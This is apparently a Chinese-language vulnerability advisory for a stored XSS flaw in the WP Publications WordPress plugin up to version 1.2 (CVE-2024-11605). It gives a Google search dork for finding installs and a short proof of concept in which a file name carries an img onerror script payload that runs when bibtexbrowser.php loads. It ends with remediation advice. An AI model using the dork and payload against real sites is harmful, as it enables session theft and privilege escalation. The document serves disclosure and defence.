漏洞标题:WP Publications WordPress插件1.2 - 存储型XSS
Google搜索语法:inurl:/wp-content/plugins/wp-publications/
日期:2025-07-15
漏洞作者:Zeynalxan Quliyev
厂商主页:https://wordpress.org/plugins/wp-publications/
软件链接:https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
版本:<= 1.2
测试环境:WordPress 6.5.3 / Linux (Apache)
CVE:CVE-2024-11605
漏洞详情
WordPress的WP Publications插件(版本<=1.2)存在**存储型跨站脚本(XSS)**漏洞。该漏洞源于插件在输出HTML前未对文件名进行转义,允许高权限用户(如管理员)注入任意JavaScript代码。
即使在WordPress配置中禁用了unfiltered_html
功能(例如多站点设置),此漏洞仍可被利用。
漏洞验证(PoC)
-
通过SSH登录服务器并导航到插件目录:
1
cd /var/www/html/wp-content/plugins/wp-publications/
-
运行以下命令创建恶意的BibTeX文件:
1
touch "<img src=x onerror=alert('XSS')>.bib"
-
通过以下URL访问插件的BibTeX浏览器:
1
https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
-
注入的JavaScript将被执行,触发XSS payload:
1
alert('XSS');
影响
- 存储型XSS(JavaScript)在管理面板上下文中执行。
- 在多站点环境中绕过
unfiltered_html
保护。 - 可用于权限提升、Cookie窃取或注入恶意内容。
修复建议
更新到能够正确转义文件名后再输出的插件版本。如果没有可用更新,请禁用插件或手动清理文件输入。